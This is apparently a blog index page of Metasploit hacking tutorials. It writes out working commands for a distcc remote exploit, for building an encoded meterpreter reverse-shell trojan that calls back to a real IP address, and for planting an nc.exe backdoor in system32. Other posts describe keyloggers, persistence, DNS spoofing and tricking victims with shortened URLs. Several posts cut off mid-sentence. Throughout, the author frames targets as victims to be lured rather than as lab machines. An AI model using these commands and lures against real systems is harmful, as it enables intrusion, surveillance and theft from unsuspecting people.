Posts

Showing posts with the label Video

[Video] Local Exploit Privilege Escalation

Hi guys, tonight I will share how to get root privileges by exploiting the vulnerability that exists in "distcc" on the machine.
About distcc: distcc is designed to speed up compilation by taking advantage of unused processing power on another computer.
How to:
1. Scan the target using the command:
   nmap -p 1-56635 -sS target-ip-addr
   then look for port 3633 (distccd).
2. Open Metasploit and enter these commands:
   msf > use exploit/unix/misc/distcc_exec
   msf exploit(distcc_exec) > set RHOST 192.168.1.10
   RHOST => 192.168.1.10
   msf exploit(distcc_exec) > set PAYLOAD cmd/unix/bind_ruby
   PAYLOAD => cmd/unix/bind_ruby
   msf exploit(distcc_exec) > exploit
   Wait until the command shell session is opened.
3. Then use these commands:
   uname -r (kernel version)
   whoami (print the user name associated with the current effective user ID)
   At this stage we do not have the root user ID, so let's get started with privilege escalation. make sure the ker...

Evilgrade + Metasploit Vs Windows Update

Evilgrade description: Evilgrade is a penetration testing tool for injecting a fake update into the victim system. There are 63 modules in Evilgrade, and every module has the structure it needs to imitate or inject a fake update for a specific application / system on the victim system. It also has its own webserver and dnsserver modules, so the attacker can carry out attacks faster. What happens is "Manipulation of Victim's DNS Traffic", or we can call it a DNS trick against the victim's traffic, when the attacker is able to create a diversion hostname. The operating system that I use is Kali Linux 1.0.1 i386. Equipment: * Evilgrade * Ettercap * Metasploit

[Video] Ettercap+Metasploit Vs Win7+Firefox

Equipment: 1. Metasploit 2. Ettercap

Megaprimer Service Meterpreter

After performing exploitation on Windows XP several times, I found a new way to gain Meterpreter access without having to set a registry value for the backdoor and run the multi handler; we again get a Meterpreter session.

DNS_Spoofing And Metasploit Framework (Browser_Autopwn)

In this post I will combine two weapons, namely:
Ettercap = for dns_Spoof
Metasploit = for exploitation
Ettercap ==>> to pull the victim to access the IP and port of the attacker
Metasploit ==>> to exploit the victim machine
OS: Kali Linux
For the tutorial please see the video below.
Regards, by: Hidemichi-Hiroyuki a.k.a [H2]

Upload nc.exe "OSbackdoor" to Victim Computer

Hello guys =)) Tonight I'm back again to learn Windows exploitation =)) and now I share this tutorial with you all =) OK, now just for fun and just for learning =))
First step: make a new trojan and encode the trojan using the Metasploit Framework:
# msfpayload windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 R | msfencode -a x86 -c 5 -b '\xff' -e x86/shikata_ga_nai -t exe > /var/www/attacker.exe
My IP address = 36.36.3.84
This saves the trojan.exe in the directory /var/www/ with the name attacker.exe. Then I send the trojan to the victim's computer (you can use MITM to get the attention of the victim).
Now we run a multi handler to listen for the meterpreter session from the victim's computer:
# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 E
After getting meterpreter, we upload the nc.exe backdoor to the victim's computer:
meterpreter > upload (PATH YOUR Nc.exe) C:\\WINDOWS\\system32\\
the bac...

Armitage Tutorial "simple exploitation"

I tried a pentest tool named Armitage for the first time, and it helps me in running exploits to gain command access to my target's computer. Equipment: 1. Armitage 2. Metasploit. Please download the above equipment if you do not have it. OS: Kali Linux. For how to use it, please see the video below. Author: Hidemichi-Hiroyuki a.k.a [H2]

[Video] Exploit windows manage persistence

I'm back again to share a method of exploiting the Windows OS. A few days ago, I tried to exploit a Windows operating system. I managed to get a meterpreter, but it stopped working because my victim restarted his machine. I did not want to redo the exploitation, so I figured out how to make it run when the victim starts his computer again. After that, I managed to get meterpreter back =)) You can see how I did it in my video below.

[Video] Exploit SBD Executable

Connect to the victim using just Wine to call the file sbd.exe. Equipment: 1. Metasploit "msfpayload & msfcli" 2. Apache2 3. Wine 4. Sbd.exe "Download". Use creativity and art in the exploitation to lure victims into the trap =)) Author: Hidemichi-Hiroyuki a.k.a [H2]

[Video] Activate Keylogger Using Metasploit - PART 2

After succeeding with keylogger part 1, I will give the next section on the keylogger. Note: we have to get a meterpreter session to run the keylogger. Check the video for this. Created by: Hidemichi-Hiroyuki a.k.a [H2]

[Video] Activate Keylogger Using Metasploit - PART 1

Today I will explain how to activate a keylogger using Metasploit. Note: we have to get a meterpreter session to run the keylogger. After getting meterpreter, we need to see what applications are being run by the victim. Check this now. Author: Hidemichi-Hiroyuki a.k.a [H2]

Exploit ShortCut_Icon_DLL-Loader + [Video]

What should we answer when the victim asks: "Why should I go to your (the attacker's) IP address?" Well, we cannot answer such a simple question from the victim, but there are several efforts that can be made during exploitation to convince the victim to go to the attacker's IP. In this exploitation I do not use MITM to lure the attacker.
Equipment:
1. msfconsole =>> Run an exploitation
2. goo.gl =>> URL shortener
3. alpine =>> Send file to victim
Planning example: I see a victim who has email active ==> then I send the DLLloader file to the victim ==> with a vague lure I convince the victim to click the URL that we have shortened ==> when the victim opens that URL, we get a meterpreter session. Victim ! DEATH ! !!
First step, run the exploit: msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(...